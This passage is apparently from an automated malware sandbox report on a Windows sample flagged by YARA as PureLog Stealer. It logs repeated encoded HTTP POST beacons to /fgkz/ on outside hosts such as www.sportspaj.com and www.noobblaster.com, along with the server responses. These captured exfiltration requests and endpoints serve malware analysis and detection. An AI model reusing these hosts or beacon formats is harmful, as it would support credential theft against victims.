                                Data Ascii: 14B1<!DOCTYPE html><html><head><meta content='text/html; charset=UTF-8' http-equiv='Content-Type'><meta content='3CbaVvw-I7MlrmmmHz0bfbko7oMCW1mn2u65uWsWWB8' name='google-site-verification'><meta content='width=device-width, initial-scale=1.0' name='viewport'><meta content='telephone=no' name='format-detection'><link href='data:;base64,iVBORw0KGgo=' rel='icon'><title>hugelmann.org is coming soon</title><link rel="stylesheet" media="screen" href="https://fonts.googleapis.com/css?family=Open+Sans:300,400,600,700" /><link rel="stylesheet" media="all" href="/assets/application-2f7e7f30d812d0f3950918c7562df7e68eeeebd8649bdea2bc3844eb07fc8269.css" /></head><body><header><a rel="nofollow" href="https://www.hover.com/?source=park
                                Aug 30, 2024 07:21:35.712038040 CEST1236INData Raw: 65 64 22 3e 3c 69 6d 67 20 77 69 64 74 68 3d 22 31 30 32 22 20 68 65 69 67 68 74 3d 22 33 30 22 20 73 72 63 3d 22 2f 61 73 73 65 74 73 2f 68 76 5f 6c 6f 67 6f 5f 72 65 74 69 6e 61 2d 36 61 32 62 61 38 33 35 30 39 30 37 64 34 61 31 37 62 66 63 37
                                Data Ascii: ed"><img width="102" height="30" src="/assets/hv_logo_retina-6a2ba8350907d4a17bfc7863c2f1378e38a53bd22b790c69c14143b0f9ce45ca.png" /></a></header><main><h1>hugelmann.org</h1><h2>is a totally awesome idea still being worked on.</h2><p clas
                                Aug 30, 2024 07:21:35.712073088 CEST1236INData Raw: 6e 6f 66 6f 6c 6c 6f 77 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 68 6f 76 65 72 2e 63 6f 6d 2f 61 62 6f 75 74 3f 73 6f 75 72 63 65 3d 70 61 72 6b 65 64 22 3e 41 62 6f 75 74 20 55 73 3c 2f 61 3e 3c 2f 6c 69 3e 0a 3c 6c 69 3e 3c
                                Data Ascii: nofollow" href="https://www.hover.com/about?source=parked">About Us</a></li><li><a rel="nofollow" href="https://help.hover.com/home?source=parked">Help</a></li><li><a rel="nofollow" href="https://www.hover.com/tools?source=parked">Your Accou
                                Aug 30, 2024 07:21:35.712119102 CEST672INData Raw: 39 36 2c 31 35 2e 37 35 33 36 35 20 2d 33 35 2e 31 38 36 39 36 2c 33 35 2e 31 38 35 32 35 20 30 2c 32 2e 37 35 37 38 31 20 30 2e 33 31 31 32 38 2c 35 2e 34 34 33 35 39 20 30 2e 39 31 31 35 35 2c 38 2e 30 31 38 37 35 20 2d 32 39 2e 32 34 33 34 34
                                Data Ascii: 96,15.75365 -35.18696,35.18525 0,2.75781 0.31128,5.44359 0.91155,8.01875 -29.24344,-1.46723 -55.16995,-15.47582 -72.52461,-36.76396 -3.02879,5.19662 -4.76443,11.24048 -4.76443,17.6891 0,12.20777 6.21194,22.97747 15.65332,29.28716 -5.76773,-0.1
                                Aug 30, 2024 07:21:35.712152004 CEST1236INData Raw: 38 2c 31 35 2e 38 30 39 34 20 36 34 2e 37 32 30 32 34 2c 30 20 31 30 30 2e 31 31 33 30 31 2c 2d 35 33 2e 36 31 35 32 34 20 31 30 30 2e 31 31 33 30 31 2c 2d 31 30 30 2e 31 31 33 38 37 20 30 2c 2d 31 2e 35 32 35 35 34 20 2d 30 2e 30 33 34 33 2c 2d
                                Data Ascii: 8,15.8094 64.72024,0 100.11301,-53.61524 100.11301,-100.11387 0,-1.52554 -0.0343,-3.04251 -0.10204,-4.55261 6.87394,-4.95995 12.83891,-11.15646 17.55618,-18.21305 z" /></g></svg></a></li><li><a rel="nofollow" href="https://www.instagram.com/h
                                Aug 30, 2024 07:21:35.712182999 CEST864INData Raw: 32 20 31 32 34 74 2d 31 32 34 20 33 32 32 71 2d 35 20 38 38 20 2d 35 20 33 31 37 74 35 20 33 31 37 71 31 30 20 32 30 38 20 31 32 34 20 33 32 32 74 33 32 32 20 31 32 34 71 38 38 20 35 20 33 31 37 20 35 74 33 31 37 20 2d 35 71 32 30 38 20 2d 31 30
                                Data Ascii: 2 124t-124 322q-5 88 -5 317t5 317q10 208 124 322t322 124q88 5 317 5t317 -5q208 -10 322 -124t124 -322q5 -88 5 -317z" /></g></svg></a></li></ul></nav></main><footer><nav><u2A2l><li>Copyright &copy; 2024 Hover</li><li><a rel="nofollow


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                37192.168.2.549755212.32.237.90805264C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe
                                TimestampBytes transferredDirectionData
                                Aug 30, 2024 07:21:40.791929007 CEST621OUTPOST /fgkz/ HTTP/1.1
                                Accept: */*
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-us
                                Host: www.sportspaj.com
                                Connection: close
                                Content-Length: 186
                                Cache-Control: max-age=0
                                Content-Type: application/x-www-form-urlencoded
                                Origin: http://www.sportspaj.com
                                Referer: http://www.sportspaj.com/fgkz/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                Data Raw: 34 66 32 74 38 3d 62 79 5a 35 4b 70 2b 4d 54 47 33 58 6c 78 76 41 73 66 71 31 6e 4c 53 2f 58 43 6e 55 2b 4c 2f 59 52 54 4e 2f 70 34 6b 67 72 75 39 68 2b 53 69 65 52 78 70 52 2f 46 59 4d 53 58 73 57 33 52 44 66 73 31 34 58 44 59 61 51 30 76 69 44 36 65 78 62 45 66 37 46 50 52 4f 67 59 6b 4e 6d 50 38 34 79 55 4b 41 31 72 36 37 45 4c 72 53 38 53 38 53 59 2b 72 6b 46 73 77 58 37 35 72 4c 30 59 32 76 56 47 51 30 4c 6f 47 4d 6f 6d 70 57 36 52 58 36 43 77 4b 4e 67 66 73 39 59 51 79 52 55 78 49 77 57 49 43 33 4e 65 76 65 44 42 6f 6b 68 42 6d 38 77 71 51 3d 3d
                                Data Ascii: 4f2t8=byZ5Kp+MTG3XlxvAsfq1nLS/XCnU+L/YRTN/p4kgru9h+SieRxpR/FYMSXsW3RDfs14XDYaQ0viD6exbEf7FPROgYkNmP84yUKA1r67ELrS8S8SY+rkFswX75rL0Y2vVGQ0LoGMompW6RX6CwKNgfs9YQyRUxIwWIC3NeveDBokhBm8wqQ==
                                Aug 30, 2024 07:21:41.502012968 CEST366INHTTP/1.1 302 Found
                                cache-control: max-age=0, private, must-revalidate
                                connection: close
                                content-length: 11
                                date: Fri, 30 Aug 2024 05:21:40 GMT
                                location: http://survey-smiles.com
                                server: nginx
                                set-cookie: sid=bd4dd312-668f-11ef-8bfa-c4cf4829a2c4; path=/; domain=.sportspaj.com; expires=Wed, 17 Sep 2092 08:35:48 GMT; max-age=2147483647; HttpOnly
                                Data Raw: 52 65 64 69 72 65 63 74 69 6e 67
                                Data Ascii: Redirecting


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                38192.168.2.549756212.32.237.90805264C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe
                                TimestampBytes transferredDirectionData
                                Aug 30, 2024 07:21:43.333590031 CEST641OUTPOST /fgkz/ HTTP/1.1
                                Accept: */*
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-us
                                Host: www.sportspaj.com
                                Connection: close
                                Content-Length: 206
                                Cache-Control: max-age=0
                                Content-Type: application/x-www-form-urlencoded
                                Origin: http://www.sportspaj.com
                                Referer: http://www.sportspaj.com/fgkz/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                Data Raw: 34 66 32 74 38 3d 62 79 5a 35 4b 70 2b 4d 54 47 33 58 2f 52 2f 41 67 63 43 31 77 37 53 34 4a 53 6e 55 33 72 2f 63 52 54 42 2f 70 36 4a 39 72 64 56 68 2b 7a 53 65 51 77 70 52 34 46 59 4d 5a 33 73 50 36 78 44 59 73 31 46 33 44 61 65 51 30 76 32 44 36 66 42 62 45 73 44 47 64 78 4f 69 51 45 4e 34 42 63 34 79 55 4b 41 31 72 36 75 54 4c 72 4b 38 53 4e 43 59 34 50 77 43 71 41 58 34 76 37 4c 30 63 32 76 52 47 51 30 70 6f 46 4a 48 6d 71 75 36 52 58 71 43 2b 35 56 76 45 38 39 65 4f 43 51 46 69 59 6b 64 54 6a 37 41 56 50 33 56 57 6f 64 4e 45 7a 51 6a 74 74 7a 78 69 78 31 79 45 49 54 67 77 76 66 47 44 46 6c 6f 38 52 30 3d
                                Data Ascii: 4f2t8=byZ5Kp+MTG3X/R/AgcC1w7S4JSnU3r/cRTB/p6J9rdVh+zSeQwpR4FYMZ3sP6xDYs1F3DaeQ0v2D6fBbEsDGdxOiQEN4Bc4yUKA1r6uTLrK8SNCY4PwCqAX4v7L0c2vRGQ0poFJHmqu6RXqC+5VvE89eOCQFiYkdTj7AVP3VWodNEzQjttzxix1yEITgwvfGDFlo8R0=
                                Aug 30, 2024 07:21:43.937447071 CEST366INHTTP/1.1 302 Found
                                cache-control: max-age=0, private, must-revalidate
                                connection: close
                                content-length: 11
                                date: Fri, 30 Aug 2024 05:21:42 GMT
                                location: http://survey-smiles.com
                                server: nginx
                                set-cookie: sid=bec2e0e4-668f-11ef-9696-c4cfd0558d05; path=/; domain=.sportspaj.com; expires=Wed, 17 Sep 2092 08:35:50 GMT; max-age=2147483647; HttpOnly
                                Data Raw: 52 65 64 69 72 65 63 74 69 6e 67
                                Data Ascii: Redirecting


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                39192.168.2.549757212.32.237.90805264C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe
                                TimestampBytes transferredDirectionData
                                Aug 30, 2024 07:21:45.857043028 CEST1654OUTPOST /fgkz/ HTTP/1.1
                                Accept: */*
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-us
                                Host: www.sportspaj.com
                                Connection: close
                                Content-Length: 1218
                                Cache-Control: max-age=0
                                Content-Type: application/x-www-form-urlencoded
                                Origin: http://www.sportspaj.com
                                Referer: http://www.sportspaj.com/fgkz/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                Data Raw: 34 66 32 74 38 3d 62 79 5a 35 4b 70 2b 4d 54 47 33 58 2f 52 2f 41 67 63 43 31 77 37 53 34 4a 53 6e 55 33 72 2f 63 52 54 42 2f 70 36 4a 39 72 62 4e 68 2b 68 32 65 52 58 39 52 35 46 59 4d 55 58 73 4b 36 78 43 64 73 78 52 6f 44 61 43 75 30 70 79 44 34 39 4a 62 43 64 44 47 45 42 4f 69 53 45 4e 35 50 38 35 77 55 4b 78 38 72 36 2b 54 4c 72 4b 38 53 50 71 59 2f 62 6b 43 6f 41 58 37 35 72 4c 43 59 32 76 70 47 52 64 57 6f 45 38 34 6d 61 4f 36 66 57 61 43 79 72 4e 76 5a 73 39 63 50 43 51 64 69 59 35 46 54 6a 33 6d 56 4f 43 49 57 71 64 4e 45 32 78 6d 78 4a 69 75 31 33 46 66 4b 70 43 71 33 5a 47 46 59 45 4d 79 2b 31 5a 5a 6f 79 74 42 6e 67 51 4f 6c 39 71 4f 4d 6c 54 68 33 72 48 6a 37 54 6f 52 7a 62 66 33 2f 6b 6b 4d 75 6f 6f 45 64 5a 71 45 6d 32 4f 43 50 57 68 2f 34 70 65 79 64 41 4a 44 41 7a 57 51 5a 63 42 79 78 4f 4a 50 34 37 62 47 66 63 49 31 4b 49 78 49 56 54 79 4e 56 36 70 49 47 33 2f 43 5a 35 58 69 69 31 6e 68 6b 54 32 59 72 52 4c 72 4f 4d 58 2f 38 7a 50 57 71 56 62 69 75 33 33 69 74 41 33 4b 79 6f 4a 30 [TRUNCATED]
                                Data Ascii: 4f2t8=byZ5Kp+MTG3X/R/AgcC1w7S4JSnU3r/cRTB/p6J9rbNh+h2eRX9R5FYMUXsK6xCdsxRoDaCu0pyD49JbCdDGEBOiSEN5P85wUKx8r6+TLrK8SPqY/bkCoAX75rLCY2vpGRdWoE84maO6fWaCyrNvZs9cPCQdiY5FTj3mVOCIWqdNE2xmxJiu13FfKpCq3ZGFYEMy+1ZZoytBngQOl9qOMlTh3rHj7ToRzbf3/kkMuooEdZqEm2OCPWh/4peydAJDAzWQZcByxOJP47bGfcI1KIxIVTyNV6pIG3/CZ5Xii1nhkT2YrRLrOMX/8zPWqVbiu33itA3KyoJ0tDMKCgGNkOkcC3F6klBe1/ulEPobeOWvPOxOXO9uRw4vE/XVfCVmHVEAyoRTWbj65cEnFTk5TSP9eHnmp53OmkwLPO7gGxwwjGwGAsIfNgVgRc64WJ8wABRxNf0oUSWe8fCGRWGpPvOrTnv3qJR4CyRkisF2ajcDefVN9r9rsyXmbp5Y8i/ryns+1wNASgfo6+t4spF1G0nd8GjxpqJvYJR2HvROt1Ip3Fo9/z53sKqK/ytGOcEHi2WNKmy9han9IvSwfoa2k3f88HHphlxguAer+2hjXTbT6s9Il2SejYyUly+Y49nh67ZLMQ9/aWMHIjA3ZUhfriB7+1i7cGAJU5iMMijhSy6sf3CAda+ZmUIUEsufVxdVHKmWpCo8XgtPvx91KKG2+OyT0zfIpNoAcYXXjSd1i6Zd5FpRA3k5cwWPWZ7m6upowcKPB91mfHRpM1EDZB9amBtahbn3SXFw9IMil7HFGtR5iyBVmaCwV2Pu8M2uKwApFO63n6pkRLMpBOa5WYSWdZr8MZEfzIB4mnlfRc509lNVKClLGmnYACt0U5YAJ4Q44KabDLHDjlXikmEjWcWl5vNbQZp3R4/eK32ZoS1VDTFuejl9tDF9xos8kR+OyDp+kMRykYGz6o9RVlpg2cngDHWvZwdB6Tb/20GjZOZ6edXzmF [TRUNCATED]


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                40192.168.2.549758212.32.237.90805264C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe
                                TimestampBytes transferredDirectionData
                                Aug 30, 2024 07:21:48.390089035 CEST347OUTGET /fgkz/?nFeHa=dbNpTj&4f2t8=WwxZJefTXlbC80/BpveukZyNeg7V77XnTSoth6J++MJln1PDQgVuwSMNXVc16zr9hGsIX6790/Sw0PUDFf+oDAGEaENhNNwIZQ== HTTP/1.1
                                Accept: */*
                                Accept-Language: en-us
                                Host: www.sportspaj.com
                                Connection: close
                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                Aug 30, 2024 07:21:52.388220072 CEST1056INHTTP/1.1 200 OK
                                accept-ch: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                cache-control: max-age=0, private, must-revalidate
                                connection: close
                                content-length: 611
                                content-type: text/html; charset=utf-8
                                date: Fri, 30 Aug 2024 05:21:51 GMT
                                server: nginx
                                set-cookie: sid=c1ca1a77-668f-11ef-8477-c4cf53dbc2a8; path=/; domain=.sportspaj.com; expires=Wed, 17 Sep 2092 08:35:59 GMT; max-age=2147483647; HttpOnly
                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4c 6f 61 64 69 6e 67 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 3e 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 70 6f 72 74 73 70 61 6a 2e 63 6f 6d 2f 66 67 6b 7a 2f 3f 34 66 32 74 38 3d 57 77 78 5a 4a 65 66 54 58 6c 62 43 38 30 25 32 46 42 70 76 65 75 6b 5a 79 4e 65 67 37 56 37 37 58 6e 54 53 6f 74 68 36 4a 2b 2b 4d 4a 6c 6e 31 50 44 51 67 56 75 77 53 4d 4e 58 56 63 31 36 7a 72 39 68 47 73 49 58 36 37 39 30 25 32 46 53 77 30 50 55 44 46 66 2b 6f 44 41 47 45 61 45 4e 68 4e 4e 77 49 5a 51 25 33 44 25 33 44 26 63 68 3d 31 26 6a 73 3d 65 79 4a 68 62 47 63 69 4f 69 4a 49 55 7a 49 31 4e 69 49 73 49 6e 52 35 63 43 49 36 49 6b 70 58 56 43 4a 39 2e 65 79 4a 68 64 57 51 69 4f 69 4a 4b 62 32 74 6c 62 69 49 73 49 6d 56 34 63 43 49 36 4d 54 63 79 4e 54 41 77 4d 6a 55 77 4f [TRUNCATED]
                                Data Ascii: <html><head><title>Loading...</title></head><body><script type='text/javascript'>window.location.replace('http://www.sportspaj.com/fgkz/?4f2t8=WwxZJefTXlbC80%2FBpveukZyNeg7V77XnTSoth6J++MJln1PDQgVuwSMNXVc16zr9hGsIX6790%2FSw0PUDFf+oDAGEaENhNNwIZQ%3D%3D&ch=1&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKb2tlbiIsImV4cCI6MTcyNTAwMjUwOCwiaWF0IjoxNzI0OTk1MzA4LCJpc3MiOiJKb2tlbiIsImpzIjoxLCJqdGkiOiIydm82azYwa2kwOXI3bjdoNGczNWVhc2QiLCJuYmYiOjE3MjQ5OTUzMDgsInRzIjoxNzI0OTk1MzA4OTM5NTU0fQ.WhwdG522gCSTegPIUPVLvtJNKIOPD771kpxTzkFxwKo&nFeHa=dbNpTj&sid=c1ca1a77-668f-11ef-8477-c4cf53dbc2a8');</script></body></html>


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                41192.168.2.549759167.172.228.26805264C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe
                                TimestampBytes transferredDirectionData
                                Aug 30, 2024 07:21:58.141253948 CEST627OUTPOST /fgkz/ HTTP/1.1
                                Accept: */*
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-us
                                Host: www.noobblaster.com
                                Connection: close
                                Content-Length: 186
                                Cache-Control: max-age=0
                                Content-Type: application/x-www-form-urlencoded
                                Origin: http://www.noobblaster.com
                                Referer: http://www.noobblaster.com/fgkz/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                Data Raw: 34 66 32 74 38 3d 36 6b 52 79 2f 6b 2b 76 2f 47 58 4d 4b 39 78 34 52 55 45 6b 64 76 54 7a 2f 73 64 69 2f 34 37 6a 39 42 30 77 51 78 78 55 45 79 32 30 45 68 47 32 59 31 76 4f 44 69 4e 57 2b 67 37 4c 38 4c 30 6f 6a 74 6f 46 74 62 74 50 56 6e 62 5a 4b 31 39 37 4d 76 4f 5a 6a 6c 7a 63 66 75 71 7a 59 74 78 4b 55 53 36 35 79 43 46 44 66 52 4d 43 64 45 77 74 75 72 54 73 47 36 32 33 65 2b 39 5a 4a 57 6d 4e 59 78 6a 44 79 34 61 43 57 4b 46 34 74 54 58 51 4e 74 74 6f 58 39 72 2f 32 36 70 30 6f 6d 49 67 58 6f 66 39 70 37 2b 44 4b 33 33 62 2f 57 57 2f 54 77 3d 3d
                                Data Ascii: 4f2t8=6kRy/k+v/GXMK9x4RUEkdvTz/sdi/47j9B0wQxxUEy20EhG2Y1vODiNW+g7L8L0ojtoFtbtPVnbZK197MvOZjlzcfuqzYtxKUS65yCFDfRMCdEwturTsG623e+9ZJWmNYxjDy4aCWKF4tTXQNttoX9r/26p0omIgXof9p7+DK33b/WW/Tw==
                                Aug 30, 2024 07:21:58.802145958 CEST152INHTTP/1.1 302
                                Server: nginx/1.20.1
                                Date: Fri, 30 Aug 2024 05:21:58 GMT
                                Content-Length: 0
                                Connection: close
                                Location: http://ww1.noobblaster.com


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                42192.168.2.549760167.172.228.26805264C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe
                                TimestampBytes transferredDirectionData
                                Aug 30, 2024 07:22:00.675838947 CEST647OUTPOST /fgkz/ HTTP/1.1
                                Accept: */*
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-us
                                Host: www.noobblaster.com
                                Connection: close
                                Content-Length: 206
                                Cache-Control: max-age=0
                                Content-Type: application/x-www-form-urlencoded
                                Origin: http://www.noobblaster.com
                                Referer: http://www.noobblaster.com/fgkz/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                Data Raw: 34 66 32 74 38 3d 36 6b 52 79 2f 6b 2b 76 2f 47 58 4d 62 73 42 34 42 48 73 6b 61 50 54 30 7a 4d 64 69 31 59 37 6e 39 42 34 77 51 77 30 52 45 48 75 30 45 41 32 32 4a 45 76 4f 57 69 4e 57 77 41 37 53 68 62 31 71 6a 74 6b 6a 74 5a 35 50 56 6e 50 5a 4b 31 74 37 50 59 61 47 6c 31 7a 6b 4c 65 71 78 48 39 78 4b 55 53 36 35 79 43 52 74 66 52 55 43 64 30 67 74 75 50 48 72 59 71 32 32 4f 4f 39 5a 4e 57 6d 4a 59 78 6a 74 79 35 47 73 57 49 39 34 74 52 66 51 4f 38 74 72 5a 39 72 35 38 61 6f 38 6a 6c 78 49 54 4c 4c 6f 6a 35 2b 48 64 54 57 66 33 6a 36 73 55 50 57 31 2f 6e 64 51 4f 76 77 6c 67 66 49 67 63 36 39 6d 4f 4b 73 3d
                                Data Ascii: 4f2t8=6kRy/k+v/GXMbsB4BHskaPT0zMdi1Y7n9B4wQw0REHu0EA22JEvOWiNWwA7Shb1qjtkjtZ5PVnPZK1t7PYaGl1zkLeqxH9xKUS65yCRtfRUCd0gtuPHrYq22OO9ZNWmJYxjty5GsWI94tRfQO8trZ9r58ao8jlxITLLoj5+HdTWf3j6sUPW1/ndQOvwlgfIgc69mOKs=
                                Aug 30, 2024 07:22:01.309004068 CEST152INHTTP/1.1 302
                                Server: nginx/1.20.1
                                Date: Fri, 30 Aug 2024 05:22:01 GMT
                                Content-Length: 0
                                Connection: close
                                Location: http://ww1.noobblaster.com


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                43192.168.2.549761167.172.228.26805264C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe
                                TimestampBytes transferredDirectionData
                                Aug 30, 2024 07:22:03.559797049 CEST1660OUTPOST /fgkz/ HTTP/1.1
                                Accept: */*
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-us
                                Host: www.noobblaster.com
                                Connection: close
                                Content-Length: 1218
                                Cache-Control: max-age=0
                                Content-Type: application/x-www-form-urlencoded
                                Origin: http://www.noobblaster.com
                                Referer: http://www.noobblaster.com/fgkz/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                Data Raw: 34 66 32 74 38 3d 36 6b 52 79 2f 6b 2b 76 2f 47 58 4d 62 73 42 34 42 48 73 6b 61 50 54 30 7a 4d 64 69 31 59 37 6e 39 42 34 77 51 77 30 52 45 48 6d 30 45 53 2b 32 62 54 7a 4f 51 53 4e 57 75 51 37 50 68 62 31 72 6a 70 41 6e 74 5a 46 35 56 6c 33 5a 62 6d 31 37 62 39 6d 47 73 31 7a 6b 55 4f 71 77 59 74 77 51 55 53 71 44 79 43 42 74 66 52 55 43 64 79 6b 74 6f 62 54 72 61 71 32 33 65 2b 39 76 4a 57 6d 68 59 79 54 62 79 35 43 53 57 35 64 34 73 79 33 51 43 71 35 72 52 39 72 37 37 61 70 36 6a 6b 4e 58 54 4c 58 6b 6a 35 4c 51 64 55 36 66 32 47 33 70 50 73 6a 74 75 56 78 49 47 74 6b 42 31 71 52 74 59 50 31 54 54 4d 55 34 65 64 66 41 46 6d 78 4f 72 71 38 5a 49 55 76 49 55 6d 57 4f 75 73 6f 75 42 46 7a 63 77 46 73 68 64 30 56 4d 4c 38 62 75 34 4d 62 75 77 2b 76 6e 75 7a 4f 4b 35 74 62 6c 75 47 2b 4f 59 70 2f 75 47 66 4c 4e 36 4d 53 43 56 70 31 70 36 4b 71 46 39 53 63 46 63 7a 58 75 31 66 6d 62 6b 48 6c 63 4f 54 79 43 70 6d 63 4f 7a 38 6e 4b 36 62 6d 4b 5a 32 74 70 6d 48 77 66 4e 53 42 57 34 66 55 50 74 6f 6a 6c [TRUNCATED]
                                Data Ascii: 4f2t8=6kRy/k+v/GXMbsB4BHskaPT0zMdi1Y7n9B4wQw0REHm0ES+2bTzOQSNWuQ7Phb1rjpAntZF5Vl3Zbm17b9mGs1zkUOqwYtwQUSqDyCBtfRUCdyktobTraq23e+9vJWmhYyTby5CSW5d4sy3QCq5rR9r77ap6jkNXTLXkj5LQdU6f2G3pPsjtuVxIGtkB1qRtYP1TTMU4edfAFmxOrq8ZIUvIUmWOusouBFzcwFshd0VML8bu4Mbuw+vnuzOK5tbluG+OYp/uGfLN6MSCVp1p6KqF9ScFczXu1fmbkHlcOTyCpmcOz8nK6bmKZ2tpmHwfNSBW4fUPtojlyeqx4ax30UGwv27EVcrMlODkvIfzj8ENkHju4VugqNQ85EE4NVZGd++ad9KxhxkzrypOc8HC/pQhwZ/BG+F+wcqIuQ1T4xV3LhvOKTGiWNxwUZz4Edn9oEYfB5TSl4f1fxBSe2ZvVvn3Miz3cuggck+Usko9dydCZKcAMkzrmCxXdZFpTwkJnbMi253whu1lAsEFGBnZCp5xI/z0pl16jwBFHgEkrb5HXVJ8lds07zK2L3GT8KxzPwAn6kQPKEfsk2TaZWXBS/qqR8D0AYxK14weOxx925qNI8edD8HUZjaPkUrwIPpaGZadebPqdWicNd6ONvYBPBtiXXVMbY3YKZcJ0KvzW4h1EZ9p4kOSjPVdZjAGCkbLGfnKqPwZxZqQzAGg9BPCiSwa6SnMPKPiTZ9M5TDsjtdJ/1n9NI8HgQTUtceJtP7K589BD9ZbCd2CYmuNsOD1ShD3hZdinboLWGmj9d3+1t0jsZLPfEx4+ALktVuyDxFXjv+uBt67KVxgBzKnTBBarolYeI7QdEZtLcEN/C/53qfPvNt2TfKD8axG213+LRBbBFQvCmrmYICCrNp1492qG+ueXimQV99ZwQdFxjDzESTLiy44QBj18Wzz8agpsbXj25S5c9ObLi40sB5TJVk3by3cXBgRwie9YeFJdeXyLq9GFu [TRUNCATED]
                                Aug 30, 2024 07:22:04.226394892 CEST152INHTTP/1.1 302
                                Server: nginx/1.20.1
                                Date: Fri, 30 Aug 2024 05:22:04 GMT
                                Content-Length: 0
                                Connection: close
                                Location: http://ww1.noobblaster.com


                                Session IDSource IPSource PortDestination IPDestination Port
                                44192.168.2.549762167.172.228.2680
                                TimestampBytes transferredDirectionData
                                Aug 30, 2024 07:22:06.450171947 CEST349OUTGET /fgkz/?4f2t8=3m5S8RLi2FvoSMlAd2YNW/TJwuNR/4L3lTg0ZykUeQS0d3bBVkf5OCtf3wLO2p5Qie0G5ZQmXW/kTWMxHN/hjFLiWPmpcdZuTA==&nFeHa=dbNpTj HTTP/1.1
                                Accept: */*
                                Accept-Language: en-us
                                Host: www.noobblaster.com
                                Connection: close
                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                Aug 30, 2024 07:22:07.118612051 CEST152INHTTP/1.1 302
                                Server: nginx/1.20.1
                                Date: Fri, 30 Aug 2024 05:22:07 GMT
                                Content-Length: 0
                                Connection: close
                                Location: http://ww1.noobblaster.com


                                Statistics

                                CPU Usage

                                Click to jump to process

                                Memory Usage

                                Click to jump to process

                                High Level Behavior Distribution

                                Click to dive into process behavior distribution

                                Behavior

                                Click to jump to process

                                System Behavior

                                General

                                Target ID:0
                                Start time:01:17:57
                                Start date:30/08/2024
                                Path:C:\Users\user\Desktop\UnmxRI.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\UnmxRI.exe"
                                Imagebase:0xc0000
                                File size:1'097'216 bytes
                                MD5 hash:E34C33903020A81F3A09A69C29ADE426
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2100365796.0000000006850000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2086201250.00000000026E9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2086201250.0000000002727000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
